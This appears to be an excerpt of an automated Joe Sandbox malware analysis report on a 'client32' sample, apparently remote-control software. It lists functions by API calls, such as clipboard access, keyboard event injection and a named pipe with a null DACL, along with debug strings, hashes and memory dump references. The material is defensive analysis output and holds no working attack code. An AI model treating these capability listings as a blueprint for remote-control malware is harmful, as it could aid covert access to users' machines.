Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51

Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 110CB7D9
IsIconic.USER32(00000001), ref: 110CB7E9
GetClientRect.USER32(00000001,?,?,?), ref: 110CB7F8
GetSystemMetrics.USER32(00000000,?,?), ref: 110CB80D
GetSystemMetrics.USER32(00000001,?,?), ref: 110CB814
IsIconic.USER32(00000001), ref: 110CB844
GetWindowRect.USER32(00000001,?), ref: 110CB853
SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D), ref: 110CB907

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CB7BF, 110CB8E7
m_hWnd, xrefs: 110CB7C4, 110CB8EC
..\ctl32\nsmdlg.cpp, xrefs: 110CB799
m_eh, xrefs: 110CB79E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 2655531791-1552842965
Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90

Function 1115F840 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 459COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
RemovePropA.USER32(?), ref: 1115F8A5
RemovePropA.USER32(?), ref: 1115F8B4
RemovePropA.USER32(?,00000000), ref: 1115F8C3

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115FC59

Strings

old_wndproc, xrefs: 1115F85D
qu, xrefs: 1115F886
..\ctl32\wndclass.cpp, xrefs: 1115F858

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc$qu
API String ID: 1777853711-1160559903
Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1

Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
GetLastError.KERNEL32 ref: 110F3820
Sleep.KERNEL32(000003E8), ref: 110F383F
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
LocalFree.KERNEL32(?), ref: 110F386F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

pSD, xrefs: 110F37C5
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
CreateNamedPipe %s failed, error %d, xrefs: 110F3828

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
API String ID: 3134831419-838605531
Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795

Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

CheckClip Error: Can't open clip, e=%d, xrefs: 110337B0
Sendclip Error: Cant open clip, xrefs: 1103382D
Client, xrefs: 1103375E, 1103386B, 110339FA
openclip Error: Cant open clip, xrefs: 110339A2
DisableClipBoard, xrefs: 11033759, 11033866, 110339F5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
API String ID: 0-293745777
Opcode ID: 9536a60b758250b3cbeb57692f02060c19a68f93a4214de302fa188a7fb51758
Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
Opcode Fuzzy Hash: 9536a60b758250b3cbeb57692f02060c19a68f93a4214de302fa188a7fb51758
Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91

Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 110934A9

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
FindWindowA.USER32 ref: 110934EA
SetForegroundWindow.USER32(00000000), ref: 110934F1

Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982

Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424

Part of subcall function 11091A50: CreateWindowExA.USER32 ref: 11091A9D
Part of subcall function 11091A50: UpdateWindow.USER32 ref: 11091AEF

CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531

Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B1A
Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
Part of subcall function 11091B00: DispatchMessageA.USER32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B5B
Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B6B

CloseHandle.KERNEL32(00000000), ref: 11093555

Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE

Strings

NSMClassList, xrefs: 110934E5
NSMFindClassEvent, xrefs: 110934CD, 11093526

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
String ID: NSMClassList$NSMFindClassEvent
API String ID: 1622498684-2883797795
Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5

Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(?), ref: 11033361
GetClipboardData.USER32 ref: 1103337D
GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
GetLastError.KERNEL32 ref: 11033406
GlobalUnlock.KERNEL32(00000000), ref: 11033426

Strings

..\ctl32\clipbrd.cpp, xrefs: 1103334E
pData && pSize, xrefs: 11033353

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
String ID: ..\ctl32\clipbrd.cpp$pData && pSize
API String ID: 1861668072-1296821031
Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90

Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00001770,0000000A,?,00000000,?,110CF1A6,?), ref: 1108946F
LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6

Strings

hMap, xrefs: 1108949D
..\ctl32\Errorhan.cpp, xrefs: 11089498, 110894C7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLock
String ID: ..\ctl32\Errorhan.cpp$hMap
API String ID: 2752051264-327499879
Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1

Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11113387
GetTickCount.KERNEL32(?,11122D16,00000000,00000000), ref: 111133A1

Strings

nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
..\ctl32\Remote.cpp, xrefs: 111133D4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountIconicTick
String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
API String ID: 1307367305-2838568823
Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A

Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(000000FF), ref: 110C10AD
ShowWindow.USER32(000000FF,00000009), ref: 110C10BD
BringWindowToTop.USER32(000000FF), ref: 110C10C7
GetCurrentThreadId.KERNEL32(00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 110C10E8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringCurrentIconicShowThread
String ID:
API String ID: 4184413098-0
Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0

Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
keybd_event.USER32 ref: 11113215

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevicekeybd_event
String ID:
API String ID: 1421710848-0
Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0

Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
SetClipboardData.USER32(00000000,00000000), ref: 11033612

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$DataFormatName
String ID:
API String ID: 3172747766-0
